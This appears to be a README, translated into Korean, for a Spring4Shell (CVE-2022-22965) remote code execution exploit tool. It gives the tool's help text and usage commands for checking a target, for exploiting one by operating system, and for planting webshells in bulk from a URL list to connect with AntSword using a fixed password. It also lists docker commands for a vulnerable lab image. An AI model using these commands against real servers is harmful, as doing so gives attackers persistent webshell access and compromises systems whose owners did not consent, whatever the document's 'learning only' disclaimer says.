
Spring 프레임워크 RCE 취약점 CVE-2022-22965
영향 범위: JDK>=9의 Spring 프레임워크 및 파생 프레임워크
스크립트는 학습 목적으로만 제공되며, 다른 용도로 사용할 경우 발생하는 법적 책임은 작성자와 전혀 무관합니다
pip3 install -r requirements.txt
$ python3 spring-core-rce.py -h
.----..-.-. .---. .-..-. .-..----. .----. .---. .---. .----. .---. .----..----.
{ {__-`| } }}} }}_}{ || \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\ {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-' `-'-' `-'`-' `-'`----' `----' `---' `-'-' `----' `-'-' `----'`----'
Spring framework Core RCE
By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]
Spring framework Core 0day RCE 帮助指南
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 指定url
-s SYSTEM, --system SYSTEM
指定目标主机操作系统,默认linux,参数为win/linux
-r FILE, --file FILE 指定url文件,批量写马
비파괴 탐지
-u,--url 또는 -f,--file로 배치 탐지
-c,--check, 인자는 자체 구축한 HTTP 서비스이며,
python3 -m http.server 80으로 웹 서버를 빠르게 구축할 수 있습니다주로 내부 네트워크에서 비파괴 취약점 탐지가 필요할 때 사용합니다
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

-u로 URL을 지정하고, -s로 운영체제를 지정합니다. 인자는 linux 또는 win이며, 기본값은 linux입니다
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"


-r로 웹셸을 배치 생성하고, AntSword로 연결합니다. 비밀번호는 k3rwin입니다
python3 spring-core-rce.py -r "urls.txt"


docker pull vulfocus/spring-core-rce-2022-03-29:latest
docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29